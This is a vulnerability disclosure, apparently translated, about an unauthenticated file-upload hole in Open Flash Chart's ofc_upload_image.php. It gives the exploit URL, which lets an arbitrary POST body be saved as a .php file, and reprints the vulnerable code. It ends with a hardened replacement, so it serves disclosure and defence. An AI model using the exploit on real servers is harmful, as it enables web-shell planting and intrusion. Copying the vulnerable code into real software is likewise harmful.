POST-data vulnerability: the vulnerable file saves arbitrary POST data under any file extension
Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name that gets written)

POST arbitrary data.
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

The vulnerable file is still present in the latest version of wss, even in the paid edition; the demo deployed on the Sina store has it too.

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//
/*
print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );
print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
*/

// default path for the image to be stored //
$default_path = '../tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
// NOTE: the file name comes straight from the query string; basename() only
// strips directory components, so any extension, .php included, is accepted.
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//
// NOTE: the raw POST body is written to disk unchanged and without any
// authentication or content check, so the client controls both name and content.
$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();

//
// PHP5:
//
// NOTE: exit() above ends the script, so the $_FILES branch below never runs.

// default path for the image to be stored //
$default_path = 'tmp-upload-images/';
if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}

?>

Fix:
This vulnerable file is a disaster. How to fix it: add authorization checks, extension validation and the like. Do it yourself.
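The checks the fix calls for, as an added example that is not the project's own code: a hardened replacement for the raw-POST branch of ofc_upload_image.php, written in PHP. It assumes a session login that sets $_SESSION['user_id'] (hypothetical) and reads the body from php://input instead of the deprecated $HTTP_RAW_POST_DATA.

```php
<?php
// Added example, not part of the original ofc_upload_image.php or the
// Open Flash Chart project. Assumes an existing login sets
// $_SESSION['user_id'] (hypothetical).
session_start();

// 1. Authorization: only authenticated users may store images.
if (empty($_SESSION['user_id'])) {
    http_response_code(403);
    exit('forbidden');
}

// 2. Extension allow-list, compared case-insensitively so "x.PHP" is
//    rejected as well as "x.php".
$allowed = ['png' => 'image/png', 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg'];
$requested = basename($_GET['name'] ?? '');
$ext = strtolower(pathinfo($requested, PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) {
    http_response_code(400);
    exit('unsupported file type');
}

// 3. Content check: the body must really be an image of the claimed type,
//    not just carry an image extension; also bound its size.
$body = file_get_contents('php://input');
if ($body === false || strlen($body) === 0 || strlen($body) > 5 * 1024 * 1024) {
    http_response_code(400);
    exit('bad body');
}
$info = @getimagesizefromstring($body);
if ($info === false || $info['mime'] !== $allowed[$ext]) {
    http_response_code(400);
    exit('body is not a ' . $ext . ' image');
}

// 4. Server-chosen filename: the client-supplied name never reaches the
//    filesystem, so traversal and odd characters are no longer a concern.
$dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
    http_response_code(500);
    exit('cannot create upload directory');
}
$stored = bin2hex(random_bytes(16)) . '.' . $ext;
if (file_put_contents($dir . $stored, $body, LOCK_EX) === false) {
    http_response_code(500);
    exit('write failed');
}
echo 'Saved as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
```

Independently of these checks, the tmp-upload-images directory should be configured in the web server so that nothing inside it is ever executed as a script.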